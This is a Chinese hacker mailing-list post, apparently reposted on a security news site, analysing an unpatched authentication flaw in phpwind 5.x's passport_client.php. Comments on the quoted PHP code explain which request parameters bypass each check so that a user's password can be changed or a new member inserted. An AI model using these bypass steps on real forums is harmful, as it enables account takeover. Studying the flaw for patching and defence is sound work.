Ph4nt0m] Re: Another phpwind 5.x 0day
ph4nt0m@googlegroups.com
今天要luoluo牛抓了下包,这个漏洞挺牛的 :)
passport_client.php 里变量没有初始化可以绕过那些判断:
if(!$passport_ifopen || $passport_type != ’client’){
exit("Passport closed(PHPWind)");
}//提交:passport_ifopen =1&passport_type=client绕过
if(md5($action.$userdb.$forward.$passport_key) != $verify){
exit(’Illegal request(PHPWind)’);
} //里面的变量都可以自定义,所以你可以sy一下绕过
parse_str(StrCode($userdb,’DECODE’),$userdb); //注意StrCode($userdb,’DECODE’),所以你要把你提交的变量$userdb,StrCode($userdb,’DECODE’)编码一下
if($action==’login’){//提交action=login
if(!$userdb[’time’] || !$userdb[’username’] || !$userdb[’password’]){
exit("Lack of parameters(PHPWind)");
}//提交的 $userdb解码以后要有这些数据
if($timestamp-$userdb[’time’]>3600){
exit(’Passport request expired(PHPWind)’);
}//提交时间userdb[’time’] 大一点
.....
$rt=$db->get_one("SELECT uid $sql FROM pw_members WHERE username=’$userdb[username]’");
if($rt){ //如果有这个用户的话调用下面的语句修改密码等
$sql && $db->update("UPDATE pw_members SET $sql WHERE uid=’$rt[uid]’");
$sql2 && $db->update("UPDATE pw_memberdata SET $sql2 WHERE uid=’$rt[uid]’");
}else{//如果没有这个用户就会调用下面的增加一个
$db->update("REPLACE INTO pw_members($sql1,groupid,memberid,gender,regdate,signchange) VALUES($sql2,’-1’,’8’,’0’,’$timestamp’,’1’)");
..............
关于phpwind 5.01-5.3 0day的分析
0
相关文章
- 专业安全防御 超级巡警新版评测杨京京 · 2008-07-16
- 思杰NetScaler MPX大幅将削减IDC成本李翔 · 2008-06-11
- Dr Web大蜘蛛走进校园王秋娥 · 2008-06-11
- 不一样的安全体验 360浏览器试用杨京京 · 2008-06-02
- 安达通全国巡展开幕王秋娥 · 2008-05-05
- H3C“智商”系列解决方案 扬帆08发现之旅王秋娥 · 2008-04-02
- 展室金融行业应用方案杨京京 · 2008-03-31
- NSA网络安全加速卡产品发布及技术研讨会王秋娥 · 2008-03-13
- Secure Computing邮件安全网关助力一汽集团杨京京 · 2008-02-28
- 08年P2P流量监控与管理方案出现新特征李翔 · 2008-02-25